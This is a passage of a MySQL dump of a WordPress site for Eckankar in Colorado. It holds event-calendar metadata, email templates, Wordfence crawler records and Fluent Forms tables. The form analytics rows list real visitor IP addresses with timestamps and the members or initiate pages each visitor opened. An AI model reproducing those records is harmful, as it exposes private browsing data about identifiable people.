background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4031:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195926,269412,'mec_event_status','EventScheduled'),(195927,269412,'mec_moved_online_link',''),(195928,269412,'mec_cancelled_reason',''),(195929,269412,'mec_display_cancellation_reason_in_single_page',''),(195930,269412,'protect_children',''),(195931,269412,'passster_activate_global_protection',NULL),(195932,269412,'passster_activate_protection',NULL),(195933,269412,'passster_protection_type','password'),(195934,269412,'boldgrid_hide_page_title','0'),(195935,269412,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(195936,269412,'boldgrid_in_page_containers','1'),(195951,269412,'_dp_original','266540'),(195938,269412,'_thumbnail_id','269414'),(195939,269412,'_wp_old_date','2022-04-30'),(195940,269412,'passster_area_shortcode',''),(195941,269412,'mec_cost_auto_calculate','0'),(195942,269412,'mec_style_per_event','global'),(195943,269412,'mec_trailer_url',''),(195944,269412,'mec_trailer_title',''),(195945,269412,'mec_start_datetime','2023-12-10 10:30 AM'),(195946,269412,'mec_end_datetime','2023-12-10 11:30 AM'),(195947,269412,'mec_sequence','1'),(195948,269412,'mec_event_gallery','a:0:{}'),(195949,269412,'mec_related_events','a:0:{}'),(195950,269412,'mec_banner','a:0:{}'),(195952,269412,'_edit_lock','1700584727:15'),(195953,269412,'_edit_last','15'),(195954,269414,'_wp_attached_file','2023/11/Butterfly2.webp'),(195955,269414,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:23:\"2023/11/Butterfly2.webp\";s:8:\"filesize\";i:38506;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Butterfly2-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13640;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Butterfly2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6520;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"Butterfly2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15456;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"Butterfly2-500x337.webp\";s:5:\"width\";i:500;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27422;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"Butterfly2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22502;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"Butterfly2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17508;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"Butterfly2-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195956,269416,'protect_children',''),(195957,269416,'mec_color',''),(195958,269416,'mec_location_id','122'),(195959,269416,'mec_dont_show_map','0'),(195960,269416,'mec_organizer_id','1'),(195961,269416,'mec_start_date','2023-12-03'),(195962,269416,'mec_start_time_hour','10'),(195963,269416,'mec_start_time_minutes','30'),(195964,269416,'mec_start_time_ampm','AM'),(195965,269416,'mec_start_day_seconds','37800'),(195966,269416,'mec_end_date','2023-12-03'),(195967,269416,'mec_end_time_hour','11'),(195968,269416,'mec_end_time_minutes','30'),(195969,269416,'mec_end_time_ampm','AM'),(195970,269416,'mec_end_day_seconds','41400'),(195971,269416,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-12-03\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-12-03\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195972,269416,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195973,269416,'mec_certain_weekdays','a:0:{}'),(195974,269416,'mec_allday','0'),(195975,269416,'mec_hide_time','0'),(195976,269416,'mec_hide_end_time','0'),(195977,269416,'mec_comment',''),(195978,269416,'mec_repeat_status','0'),(195979,269416,'mec_repeat_type',''),(195980,269416,'mec_repeat_interval','1'),(195981,269416,'mec_repeat_end',''),(195982,269416,'mec_repeat_end_at_occurrences','9'),(195983,269416,'mec_repeat_end_at_date',''),(195984,269416,'mec_advanced_days','a:0:{}'),(195985,269416,'mec_in_days',''),(195986,269416,'mec_not_in_days',''),(195987,269416,'mec_hourly_schedules','a:0:{}'),(195988,269416,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195989,269416,'mec_tickets','a:0:{}'),(195990,269416,'mec_fees_global_inheritance','1'),(195991,269416,'mec_fees','a:0:{}'),(195992,269416,'mec_ticket_variations_global_inheritance','1'),(195993,269416,'mec_ticket_variations','a:0:{}'),(195994,269416,'mec_reg_fields_global_inheritance','1'),(195995,269416,'mec_reg_fields','a:0:{}'),(195996,269416,'mec_op','a:0:{}'),(195997,269416,'mec_event_date_submit','20210422105713'),(195998,269416,'mec_read_more',''),(195999,269416,'mec_more_info',''),(196000,269416,'mec_more_info_title',''),(196001,269416,'mec_more_info_target','_self'),(196002,269416,'mec_cost',''),(196003,269416,'mec_currency','a:0:{}'),(196004,269416,'mec_additional_organizer_ids','a:0:{}'),(196005,269416,'mec_additional_location_ids','a:0:{}'),(196006,269416,'one_occurrence','0'),(196007,269416,'mec_timezone','global'),(196008,269416,'mec_countdown_method','global'),(196009,269416,'mec_public','1'),(196010,269416,'mec_bfixed_fields','a:0:{}'),(196011,269416,'mec_fields','a:0:{}'),(196012,269416,'mec_event_status','EventScheduled'),(196013,269416,'mec_moved_online_link',''),(196014,269416,'mec_cancelled_reason',''),(196015,269416,'mec_display_cancellation_reason_in_single_page',''),(196016,269416,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(196017,269416,'passster_activate_global_protection',NULL),(196018,269416,'passster_activate_protection',NULL),(196019,269416,'passster_protection_type','password'),(196020,269416,'_wp_old_date','2022-01-18'),(196021,269416,'boldgrid_in_page_containers','1'),(196035,269416,'_dp_original','266827'),(196023,269416,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(196024,269416,'passster_area_shortcode',''),(196025,269416,'mec_cost_auto_calculate','0'),(196026,269416,'mec_style_per_event','global'),(196027,269416,'mec_trailer_url',''),(196028,269416,'mec_trailer_title',''),(196029,269416,'mec_start_datetime','2023-12-03 10:30 AM'),(196030,269416,'mec_end_datetime','2023-12-03 11:30 AM'),(196031,269416,'mec_sequence','10'),(196032,269416,'mec_event_gallery','a:0:{}'),(196033,269416,'mec_related_events','a:0:{}'),(196034,269416,'mec_banner','a:0:{}'),(196036,269416,'_edit_lock','1700585228:15'),(196037,269416,'_edit_last','15'),(196038,269417,'_wp_attached_file','2023/11/GoldenHU.webp'),(196039,269417,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:676;s:6:\"height\";i:380;s:4:\"file\";s:21:\"2023/11/GoldenHU.webp\";s:8:\"filesize\";i:12428;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"GoldenHU-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9432;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"GoldenHU-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8382;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:21:\"GoldenHU-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9764;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:21:\"GoldenHU-500x380.webp\";s:5:\"width\";i:500;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11328;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:21:\"GoldenHU-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10688;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:21:\"GoldenHU-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9974;}s:8:\"tileview\";a:5:{s:4:\"file\";s:21:\"GoldenHU-300x380.webp\";s:5:\"width\";i:300;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10096;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(196040,269416,'_thumbnail_id','269417');
/*!40000 ALTER TABLE `wpcl_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_postmeta` with 53977 row(s)
--

--
-- Table structure for table `wpcl_wfcrawlers`
--

DROP TABLE IF EXISTS `wpcl_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfcrawlers`
--

LOCK TABLES `wpcl_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wpcl_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wpcl_wfcrawlers` VALUES (0x00000000000000000000FFFF42F94681,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700170010,'crawl-66-249-70-129.googlebot.com'),(0x00000000000000000000FFFF42F94682,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700168211,'crawl-66-249-70-130.googlebot.com'),(0x00000000000000000000FFFF42F94683,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700168210,'crawl-66-249-70-131.googlebot.com'),(0x00000000000000000000FFFF42F9450D,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700032851,'crawl-66-249-69-13.googlebot.com'),(0x00000000000000000000FFFF42F9450F,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1699998031,'crawl-66-249-69-15.googlebot.com'),(0x00000000000000000000FFFF42F9468A,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700515332,'crawl-66-249-70-138.googlebot.com'),(0x00000000000000000000FFFF42F9468C,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700510855,'crawl-66-249-70-140.googlebot.com'),(0x00000000000000000000FFFF42F9468B,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700512389,'crawl-66-249-70-139.googlebot.com'),(0x00000000000000000000FFFF42F94604,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700584895,'crawl-66-249-70-4.googlebot.com'),(0x00000000000000000000FFFF42F94603,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700084463,'crawl-66-249-70-3.googlebot.com'),(0x00000000000000000000FFFF42F94F4C,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700221999,'crawl-66-249-79-76.googlebot.com'),(0x00000000000000000000FFFF42F94F4B,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700224910,'crawl-66-249-79-75.googlebot.com'),(0x00000000000000000000FFFF42F94F4A,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700225083,'crawl-66-249-79-74.googlebot.com'),(0x00000000000000000000FFFF42F94406,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700226343,'crawl-66-249-68-6.googlebot.com'),(0x00000000000000000000FFFF42F94403,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700253710,'crawl-66-249-68-3.googlebot.com'),(0x00000000000000000000FFFF42F94402,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700257308,'crawl-66-249-68-2.googlebot.com'),(0x00000000000000000000FFFF42F94602,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700338322,'crawl-66-249-70-2.googlebot.com'),(0x00000000000000000000FFFF42F94964,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700395352,'crawl-66-249-73-100.googlebot.com'),(0x00000000000000000000FFFF42F94966,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700398746,'crawl-66-249-73-102.googlebot.com'),(0x00000000000000000000FFFF42F94965,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700408240,'crawl-66-249-73-101.googlebot.com'),(0x00000000000000000000FFFF42F94923,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700424729,'crawl-66-249-73-35.googlebot.com'),(0x00000000000000000000FFFF42F94922,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700424729,'crawl-66-249-73-34.googlebot.com'),(0x00000000000000000000FFFF42F94921,0x8BFC17C095903E8D6230AB6F51318CF6,'verified',1700467590,'crawl-66-249-73-33.googlebot.com');
/*!40000 ALTER TABLE `wpcl_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfcrawlers` with 23 row(s)
--

--
-- Table structure for table `wpcl_fluentform_form_analytics`
--

DROP TABLE IF EXISTS `wpcl_fluentform_form_analytics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_form_analytics` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(10) unsigned DEFAULT NULL,
  `user_id` int(10) unsigned DEFAULT NULL,
  `source_url` varchar(255) NOT NULL,
  `platform` char(30) DEFAULT NULL,
  `browser` char(30) DEFAULT NULL,
  `city` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `ip` char(15) DEFAULT NULL,
  `count` int(11) DEFAULT 1,
  `created_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=27 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_form_analytics`
--

LOCK TABLES `wpcl_fluentform_form_analytics` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_form_analytics` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_form_analytics` VALUES (19,5,0,'https://eckankar-colorado.org/members-page/','Windows','Chrome',NULL,NULL,'68.102.18.2',1,'2023-10-15 16:44:15'),(18,4,0,'','Windows','Chrome',NULL,NULL,'98.53.217.232',1,'2023-10-02 16:59:20'),(17,4,0,'https://eckankar-colorado.org/members-page/','Windows','Chrome',NULL,NULL,'98.53.217.232',1,'2023-10-02 05:25:47'),(26,4,0,'https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/','Windows','Chrome',NULL,NULL,'174.29.87.194',1,'2023-11-03 02:39:06'),(24,5,0,'https://eckankar-colorado.org/initiate-page/','Windows','Chrome',NULL,NULL,'76.130.120.198',1,'2023-10-26 04:27:57'),(23,4,0,'https://eckankar-colorado.org/initiate-page/','Windows','Chrome',NULL,NULL,'76.130.120.198',1,'2023-10-26 04:27:54'),(22,5,0,'https://eckankar-colorado.org/initiate-page/','Windows','Chrome',NULL,NULL,'136.36.90.194',1,'2023-10-24 00:07:48'),(21,4,0,'https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/','Windows','Chrome',NULL,NULL,'136.36.90.194',1,'2023-10-24 00:07:27'),(20,4,0,'https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/','Apple','Chrome',NULL,NULL,'73.243.10.224',1,'2023-10-23 21:00:06'),(25,4,0,'https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/','Windows','Chrome',NULL,NULL,'66.109.210.191',1,'2023-11-02 23:16:18'),(15,4,0,'https://eckankar-colorado.org/resa-faq/eck-initiator-and-esa-scheduling-form/','Windows','Chrome',NULL,NULL,'75.216.248.164',1,'2023-09-22 19:32:45'),(16,4,0,'https://eckankar-colorado.org/members-page/','Windows','Chrome',NULL,NULL,'75.216.248.164',1,'2023-09-22 22:55:05');
/*!40000 ALTER TABLE `wpcl_fluentform_form_analytics` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_fluentform_form_analytics` with 12 row(s)
--

--
-- Table structure for table `wpcl_fluentform_forms`
--

DROP TABLE IF EXISTS `wpcl_fluentform_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_fluentform_forms` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `status` varchar(45) DEFAULT 'Draft',
  `appearance_settings` text DEFAULT NULL,
  `form_fields` longtext DEFAULT NULL,
  `has_payment` tinyint(1) NOT NULL DEFAULT 0,
  `type` varchar(45) DEFAULT NULL,
  `conditions` text DEFAULT NULL,
  `created_by` int(11) DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_fluentform_forms`
--

LOCK TABLES `wpcl_fluentform_forms` WRITE;
/*!40000 ALTER TABLE `wpcl_fluentform_forms` DISABLE KEYS */;
INSERT INTO `wpcl_fluentform_forms` VALUES (1,'Contact Form Demo','published',NULL,'{\"fields\":[{\"index\":0,\"element\":\"input_name\",\"attributes\":{\"name\":\"names\",\"data-type\":\"name-element\"},\"settings\":{\"container_class\":\"\",\"admin_field_label\":\"Name\",\"conditional_logics\":[]},\"fields\":{\"first_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"first_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"First Name\"},\"settings\":{\"container_class\":\"\",\"label\":\"First Name\",\"help_message\":\"\",\"visible\":true,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"middle_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"middle_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"\",\"required\":false},\"settings\":{\"container_class\":\"\",\"label\":\"Middle Name\",\"help_message\":\"\",\"error_message\":\"\",\"visible\":false,\"validation_rules\":{\"required\":{\"value\":false,\"message\":\"This field is required\"}},\"conditional_logics\":[]},\"editor_options\":{\"template\":\"inputText\"}},\"last_name\":{\"element\":\"input_text\",\"attributes\":{\"type\":\"text\",\"name\":\"last_name\",\"value\":\"\",\"id\":\"\",\"class\":\"\",\"placeholder\":\"Last 